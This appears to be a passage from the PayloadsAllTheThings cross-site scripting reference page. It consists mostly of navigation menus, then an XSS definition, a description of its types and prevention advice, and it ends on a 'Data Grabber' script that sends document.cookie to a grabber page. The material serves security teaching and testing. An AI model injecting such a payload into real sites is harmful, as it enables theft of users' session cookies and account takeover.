<a href="../Server%20Side%20Template%20Injection/JavaScript/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - JavaScript
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/PHP/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - PHP
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/Python/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Python
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection - Ruby
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51" >
<label class="md-nav__link" for="__nav_51" id="__nav_51_label" tabindex="0">
<span class="md-ellipsis">
Tabnabbing
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_51_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51">
<span class="md-nav__icon md-icon"></span>
Tabnabbing
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Tabnabbing/" class="md-nav__link">
<span class="md-ellipsis">
Tabnabbing
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_52" >
<label class="md-nav__link" for="__nav_52" id="__nav_52_label" tabindex="0">
<span class="md-ellipsis">
Type Juggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_52_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_52">
<span class="md-nav__icon md-icon"></span>
Type Juggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Type%20Juggling/" class="md-nav__link">
<span class="md-ellipsis">
Type Juggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_53" >
<label class="md-nav__link" for="__nav_53" id="__nav_53_label" tabindex="0">
<span class="md-ellipsis">
Upload Insecure Files
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_53_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_53">
<span class="md-nav__icon md-icon"></span>
Upload Insecure Files
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/" class="md-nav__link">
<span class="md-ellipsis">
Upload Insecure Files
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_53_2" >
<label class="md-nav__link" for="__nav_53_2" id="__nav_53_2_label" tabindex="0">
<span class="md-ellipsis">
Configuration Apache .htaccess
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_53_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_53_2">
<span class="md-nav__icon md-icon"></span>
Configuration Apache .htaccess
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess/" class="md-nav__link">
<span class="md-ellipsis">
.htaccess
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_54" >
<label class="md-nav__link" for="__nav_54" id="__nav_54_label" tabindex="0">
<span class="md-ellipsis">
Web Cache Deception
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_54_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_54">
<span class="md-nav__icon md-icon"></span>
Web Cache Deception
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Web%20Cache%20Deception/" class="md-nav__link">
<span class="md-ellipsis">
Web Cache Deception
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_55" >
<label class="md-nav__link" for="__nav_55" id="__nav_55_label" tabindex="0">
<span class="md-ellipsis">
Web Sockets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_55_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_55">
<span class="md-nav__icon md-icon"></span>
Web Sockets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Web%20Sockets/" class="md-nav__link">
<span class="md-ellipsis">
Web Sockets
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_56" >
<label class="md-nav__link" for="__nav_56" id="__nav_56_label" tabindex="0">
<span class="md-ellipsis">
XPATH Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_56_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_56">
<span class="md-nav__icon md-icon"></span>
XPATH Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XPATH%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XPATH Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_57" >
<label class="md-nav__link" for="__nav_57" id="__nav_57_label" tabindex="0">
<span class="md-ellipsis">
XSLT Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_57_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_57">
<span class="md-nav__icon md-icon"></span>
XSLT Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XSLT%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XSLT Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_58" checked>
<label class="md-nav__link" for="__nav_58" id="__nav_58_label" tabindex="0">
<span class="md-ellipsis">
XSS Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_58_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_58">
<span class="md-nav__icon md-icon"></span>
XSS Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
Cross Site Scripting
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
Cross Site Scripting
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#methodology" class="md-nav__link">
<span class="md-ellipsis">
Methodology
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#proof-of-concept" class="md-nav__link">
<span class="md-ellipsis">
Proof of Concept
</span>
</a>
<nav class="md-nav" aria-label="Proof of Concept">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#data-grabber" class="md-nav__link">
<span class="md-ellipsis">
Data Grabber
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#cors" class="md-nav__link">
<span class="md-ellipsis">
CORS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ui-redressing" class="md-nav__link">
<span class="md-ellipsis">
UI Redressing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#javascript-keylogger" class="md-nav__link">
<span class="md-ellipsis">
Javascript Keylogger
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#other-ways" class="md-nav__link">
<span class="md-ellipsis">
Other Ways
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#identify-an-xss-endpoint" class="md-nav__link">
<span class="md-ellipsis">
Identify an XSS Endpoint
</span>
</a>
<nav class="md-nav" aria-label="Identify an XSS Endpoint">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xss-in-htmlapplications" class="md-nav__link">
<span class="md-ellipsis">
XSS in HTML/Applications
</span>
</a>
<nav class="md-nav" aria-label="XSS in HTML/Applications">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#common-payloads" class="md-nav__link">
<span class="md-ellipsis">
Common Payloads
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-using-html5-tags" class="md-nav__link">
<span class="md-ellipsis">
XSS using HTML5 tags
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-using-a-remote-js" class="md-nav__link">
<span class="md-ellipsis">
XSS using a remote JS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-hidden-input" class="md-nav__link">
<span class="md-ellipsis">
XSS in Hidden Input
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-uppercase-output" class="md-nav__link">
<span class="md-ellipsis">
XSS in Uppercase Output
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#dom-based-xss" class="md-nav__link">
<span class="md-ellipsis">
DOM Based XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-js-context" class="md-nav__link">
<span class="md-ellipsis">
XSS in JS Context
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xss-in-wrappers-for-uri" class="md-nav__link">
<span class="md-ellipsis">
XSS in Wrappers for URI
</span>
</a>
<nav class="md-nav" aria-label="XSS in Wrappers for URI">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#wrapper-javascript" class="md-nav__link">
<span class="md-ellipsis">
Wrapper javascript
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#wrapper-data" class="md-nav__link">
<span class="md-ellipsis">
Wrapper data
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#wrapper-vbscript" class="md-nav__link">
<span class="md-ellipsis">
Wrapper vbscript
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xss-in-files" class="md-nav__link">
<span class="md-ellipsis">
XSS in Files
</span>
</a>
<nav class="md-nav" aria-label="XSS in Files">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#xss-in-xml" class="md-nav__link">
<span class="md-ellipsis">
XSS in XML
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-svg" class="md-nav__link">
<span class="md-ellipsis">
XSS in SVG
</span>
</a>
<nav class="md-nav" aria-label="XSS in SVG">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#short-svg-payload" class="md-nav__link">
<span class="md-ellipsis">
Short SVG Payload
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#nesting-svg-and-xss" class="md-nav__link">
<span class="md-ellipsis">
Nesting SVG and XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-markdown" class="md-nav__link">
<span class="md-ellipsis">
XSS in Markdown
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-css" class="md-nav__link">
<span class="md-ellipsis">
XSS in CSS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xss-in-postmessage" class="md-nav__link">
<span class="md-ellipsis">
XSS in PostMessage
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#blind-xss" class="md-nav__link">
<span class="md-ellipsis">
Blind XSS
</span>
</a>
<nav class="md-nav" aria-label="Blind XSS">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#xss-hunter" class="md-nav__link">
<span class="md-ellipsis">
XSS Hunter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#other-blind-xss-tools" class="md-nav__link">
<span class="md-ellipsis">
Other Blind XSS tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#blind-xss-endpoint" class="md-nav__link">
<span class="md-ellipsis">
Blind XSS endpoint
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tips" class="md-nav__link">
<span class="md-ellipsis">
Tips
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mutated-xss" class="md-nav__link">
<span class="md-ellipsis">
Mutated XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="1%20-%20XSS%20Filter%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
XSS Filter Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="2%20-%20XSS%20Polyglot/" class="md-nav__link">
<span class="md-ellipsis">
Polyglot XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="3%20-%20XSS%20Common%20WAF%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Common WAF Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="4%20-%20CSP%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
CSP Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="5%20-%20XSS%20in%20Angular/" class="md-nav__link">
<span class="md-ellipsis">
XSS in Angular and AngularJS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_59" >
<label class="md-nav__link" for="__nav_59" id="__nav_59_label" tabindex="0">
<span class="md-ellipsis">
XXE Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_59_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_59">
<span class="md-nav__icon md-icon"></span>
XXE Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../XXE%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XML External Entity
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_60" >
<label class="md-nav__link" for="__nav_60" id="__nav_60_label" tabindex="0">
<span class="md-ellipsis">
Zip Slip
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_60_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_60">
<span class="md-nav__icon md-icon"></span>
Zip Slip
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Zip%20Slip/" class="md-nav__link">
<span class="md-ellipsis">
Zip Slip
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_61" >
<label class="md-nav__link" for="__nav_61" id="__nav_61_label" tabindex="0">
<span class="md-ellipsis">
LEARNING AND SOCIALS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_61_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_61">
<span class="md-nav__icon md-icon"></span>
LEARNING AND SOCIALS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/BOOKS/" class="md-nav__link">
<span class="md-ellipsis">
Books
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/TWITTER/" class="md-nav__link">
<span class="md-ellipsis">
Twitter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../_LEARNING_AND_SOCIALS/YOUTUBE/" class="md-nav__link">
<span class="md-ellipsis">
Youtube
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_62" >
<label class="md-nav__link" for="__nav_62" id="__nav_62_label" tabindex="0">
<span class="md-ellipsis">
template vuln
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_62_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_62">
<span class="md-nav__icon md-icon"></span>
template vuln
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../_template_vuln/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Title
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#methodology" class="md-nav__link">
<span class="md-ellipsis">
Methodology
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#proof-of-concept" class="md-nav__link">
<span class="md-ellipsis">
Proof of Concept
</span>
</a>
<nav class="md-nav" aria-label="Proof of Concept">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#data-grabber" class="md-nav__link">
<span class="md-ellipsis">
Data Grabber
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#cors" class="md-nav__link">
<span class="md-ellipsis">
CORS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#ui-redressing" class="md-nav__link">
<span class="md-ellipsis">
UI Redressing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#javascript-keylogger" class="md-nav__link">
<span class="md-ellipsis">
Javascript Keylogger
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#other-ways" class="md-nav__link">
<span class="md-ellipsis">
Other Ways
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#identify-an-xss-endpoint" class="md-nav__link">
<span class="md-ellipsis">
Identify an XSS Endpoint
</span>
</a>
<nav class="md-nav" aria-label="Identify an XSS Endpoint">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#tools" class="md-nav__link">
<span class="md-ellipsis">
Tools
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xss-in-htmlapplications" class="md-nav__link">
<span class="md-ellipsis">
XSS in HTML/Applications
</span>
</a>
<nav class="md-nav" aria-label="XSS in HTML/Applications">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#common-payloads" class="md-nav__link">
<span class="md-ellipsis">
Common Payloads
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-using-html5-tags" class="md-nav__link">
<span class="md-ellipsis">
XSS using HTML5 tags
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-using-a-remote-js" class="md-nav__link">
<span class="md-ellipsis">
XSS using a remote JS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-hidden-input" class="md-nav__link">
<span class="md-ellipsis">
XSS in Hidden Input
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-uppercase-output" class="md-nav__link">
<span class="md-ellipsis">
XSS in Uppercase Output
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#dom-based-xss" class="md-nav__link">
<span class="md-ellipsis">
DOM Based XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-js-context" class="md-nav__link">
<span class="md-ellipsis">
XSS in JS Context
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xss-in-wrappers-for-uri" class="md-nav__link">
<span class="md-ellipsis">
XSS in Wrappers for URI
</span>
</a>
<nav class="md-nav" aria-label="XSS in Wrappers for URI">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#wrapper-javascript" class="md-nav__link">
<span class="md-ellipsis">
Wrapper javascript
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#wrapper-data" class="md-nav__link">
<span class="md-ellipsis">
Wrapper data
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#wrapper-vbscript" class="md-nav__link">
<span class="md-ellipsis">
Wrapper vbscript
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xss-in-files" class="md-nav__link">
<span class="md-ellipsis">
XSS in Files
</span>
</a>
<nav class="md-nav" aria-label="XSS in Files">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#xss-in-xml" class="md-nav__link">
<span class="md-ellipsis">
XSS in XML
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-svg" class="md-nav__link">
<span class="md-ellipsis">
XSS in SVG
</span>
</a>
<nav class="md-nav" aria-label="XSS in SVG">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#short-svg-payload" class="md-nav__link">
<span class="md-ellipsis">
Short SVG Payload
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#nesting-svg-and-xss" class="md-nav__link">
<span class="md-ellipsis">
Nesting SVG and XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-markdown" class="md-nav__link">
<span class="md-ellipsis">
XSS in Markdown
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#xss-in-css" class="md-nav__link">
<span class="md-ellipsis">
XSS in CSS
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#xss-in-postmessage" class="md-nav__link">
<span class="md-ellipsis">
XSS in PostMessage
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#blind-xss" class="md-nav__link">
<span class="md-ellipsis">
Blind XSS
</span>
</a>
<nav class="md-nav" aria-label="Blind XSS">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#xss-hunter" class="md-nav__link">
<span class="md-ellipsis">
XSS Hunter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#other-blind-xss-tools" class="md-nav__link">
<span class="md-ellipsis">
Other Blind XSS tools
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#blind-xss-endpoint" class="md-nav__link">
<span class="md-ellipsis">
Blind XSS endpoint
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#tips" class="md-nav__link">
<span class="md-ellipsis">
Tips
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mutated-xss" class="md-nav__link">
<span class="md-ellipsis">
Mutated XSS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#labs" class="md-nav__link">
<span class="md-ellipsis">
Labs
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS Injection/README.md" title="Edit this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M10 20H6V4h7v5h5v3.1l2-2V8l-6-6H6c-1.1 0-2 .9-2 2v16c0 1.1.9 2 2 2h4zm10.2-7c.1 0 .3.1.4.2l1.3 1.3c.2.2.2.6 0 .8l-1 1-2.1-2.1 1-1c.1-.1.2-.2.4-.2m0 3.9L14.1 23H12v-2.1l6.1-6.1z"/></svg>
</a>
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/XSS Injection/README.md" title="View source of this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 18c.56 0 1 .44 1 1s-.44 1-1 1-1-.44-1-1 .44-1 1-1m0-3c-2.73 0-5.06 1.66-6 4 .94 2.34 3.27 4 6 4s5.06-1.66 6-4c-.94-2.34-3.27-4-6-4m0 6.5a2.5 2.5 0 0 1-2.5-2.5 2.5 2.5 0 0 1 2.5-2.5 2.5 2.5 0 0 1 2.5 2.5 2.5 2.5 0 0 1-2.5 2.5M9.27 20H6V4h7v5h5v4.07c.7.08 1.36.25 2 .49V8l-6-6H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h4.5a8.2 8.2 0 0 1-1.23-2"/></svg>
</a>
<h1 id="cross-site-scripting">Cross Site Scripting</h1>
<blockquote>
<p>Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.</p>
</blockquote>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#methodology">Methodology</a></li>
<li><a href="#proof-of-concept">Proof of Concept</a><ul>
<li><a href="#data-grabber">Data Grabber</a></li>
<li><a href="#cors">CORS</a></li>
<li><a href="#ui-redressing">UI Redressing</a></li>
<li><a href="#javascript-keylogger">Javascript Keylogger</a></li>
<li><a href="#other-ways">Other Ways</a></li>
</ul>
</li>
<li><a href="#identify-an-xss-endpoint">Identify an XSS Endpoint</a><ul>
<li><a href="#tools">Tools</a></li>
</ul>
</li>
<li><a href="#xss-in-htmlapplications">XSS in HTML/Applications</a><ul>
<li><a href="#common-payloads">Common Payloads</a></li>
<li><a href="#xss-using-html5-tags">XSS using HTML5 tags</a></li>
<li><a href="#xss-using-a-remote-js">XSS using a Remote JS</a></li>
<li><a href="#xss-in-hidden-input">XSS in Hidden Input</a></li>
<li><a href="#xss-in-uppercase-output">XSS in Uppercase Output</a></li>
<li><a href="#dom-based-xss">DOM Based XSS</a></li>
<li><a href="#xss-in-js-context">XSS in JS Context</a></li>
</ul>
</li>
<li><a href="#xss-in-wrappers-for-uri">XSS in Wrappers for URI</a><ul>
<li><a href="#wrapper-javascript">Wrapper javascript:</a></li>
<li><a href="#wrapper-data">Wrapper data:</a></li>
<li><a href="#wrapper-vbscript">Wrapper vbscript:</a></li>
</ul>
</li>
<li><a href="#xss-in-files">XSS in Files</a><ul>
<li><a href="#xss-in-xml">XSS in XML</a></li>
<li><a href="#xss-in-svg">XSS in SVG</a></li>
<li><a href="#xss-in-markdown">XSS in Markdown</a></li>
<li><a href="#xss-in-css">XSS in CSS</a></li>
</ul>
</li>
<li><a href="#xss-in-postmessage">XSS in PostMessage</a></li>
<li><a href="#blind-xss">Blind XSS</a><ul>
<li><a href="#xss-hunter">XSS Hunter</a></li>
<li><a href="#other-blind-xss-tools">Other Blind XSS tools</a></li>
<li><a href="#blind-xss-endpoint">Blind XSS endpoint</a></li>
<li><a href="#tips">Tips</a></li>
</ul>
</li>
<li><a href="#mutated-xss">Mutated XSS</a></li>
<li><a href="#labs">Labs</a></li>
<li><a href="#references">References</a></li>
</ul>
<h2 id="methodology">Methodology</h2>
<p>Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS allows attackers to inject malicious code into a website, which is then executed in the browser of anyone who visits the site. This can allow attackers to steal sensitive information, such as user login credentials, or to perform other malicious actions.</p>
<p>There are 3 main types of XSS attacks:</p>
<ul>
<li>
<p><strong>Reflected XSS</strong>: In a reflected XSS attack, the malicious code is embedded in a link that is sent to the victim. When the victim clicks on the link, the code is executed in their browser. For example, an attacker could create a link that contains malicious JavaScript, and send it to the victim in an email. When the victim clicks on the link, the JavaScript code is executed in their browser, allowing the attacker to perform various actions, such as stealing their login credentials.</p>
</li>
<li>
<p><strong>Stored XSS</strong>: In a stored XSS attack, the malicious code is stored on the server, and is executed every time the vulnerable page is accessed. For example, an attacker could inject malicious code into a comment on a blog post. When other users view the blog post, the malicious code is executed in their browsers, allowing the attacker to perform various actions.</p>
</li>
<li>
<p><strong>DOM-based XSS</strong>: is a type of XSS attack that occurs when a vulnerable web application modifies the DOM (Document Object Model) in the user's browser. This can happen, for example, when a user input is used to update the page's HTML or JavaScript code in some way. In a DOM-based XSS attack, the malicious code is not sent to the server, but is instead executed directly in the user's browser. This can make it difficult to detect and prevent these types of attacks, because the server does not have any record of the malicious code.</p>
</li>
</ul>
<p>To prevent XSS attacks, it is important to properly validate and sanitize user input. This means ensuring that all input meets the necessary criteria, and removing any potentially dangerous characters or code. It is also important to escape special characters in user input before rendering it in the browser, to prevent the browser from interpreting it as code.</p>
<h2 id="proof-of-concept">Proof of Concept</h2>
<p>When exploiting an XSS vulnerability, its more effective to demonstrate a complete exploitation scenario that could lead to account takeover or sensitive data exfiltration. Instead of simply reporting an XSS with an alert payload, aim to capture valuable data, such as payment information, personal identifiable information (PII), session cookies, or credentials.</p>
<h3 id="data-grabber">Data Grabber</h3>
<p>Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="p">&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="o">=</span><span class="s1">&#39;http://localhost/XSS/grabber.php?c=&#39;</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
